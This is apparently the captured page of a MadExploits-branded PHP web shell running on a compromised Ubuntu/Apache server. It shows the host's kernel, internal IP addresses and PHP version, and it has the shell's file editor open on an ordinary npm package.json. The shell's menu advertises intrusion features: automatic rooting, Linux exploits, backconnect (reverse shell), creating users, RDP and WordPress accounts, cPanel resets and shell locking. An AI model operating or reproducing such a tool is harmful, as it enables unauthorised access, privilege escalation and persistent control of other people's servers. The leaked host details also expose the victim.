Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
@npmcli /
disparity-colors /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
1007
B
-rw-r--r--
package.json
1.09
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "@npmcli/disparity-colors", "version": "1.0.1", "files": [ "index.js" ], "engines": { "node": ">=10" }, "description": "Colorizes unified diff output", "repository": "https://github.com/npm/disparity-colors", "keywords": [ "disparity", "npm", "npmcli", "diff", "char", "unified", "multiline", "string", "color", "ansi", "terminal", "cli", "tty" ], "author": "npm Inc. <support@npmjs.com>", "contributors": [ { "name": "Ruy Adorno", "url": "https://ruyadorno.com", "twitter": "ruyadorno" } ], "license": "ISC", "scripts": { "lint": "standard index.js", "pretest": "npm run lint", "test": "tap", "snap": "tap", "preversion": "npm test", "postversion": "npm publish", "prepublishOnly": "git push origin --follow-tags" }, "tap": { "check-coverage": true }, "standard": { "ignore": [ "/tap-snapshots/" ] }, "devDependencies": { "standard": "^16.0.3", "tap": "^14.11.0" }, "dependencies": { "ansi-styles": "^4.3.0" } }
Close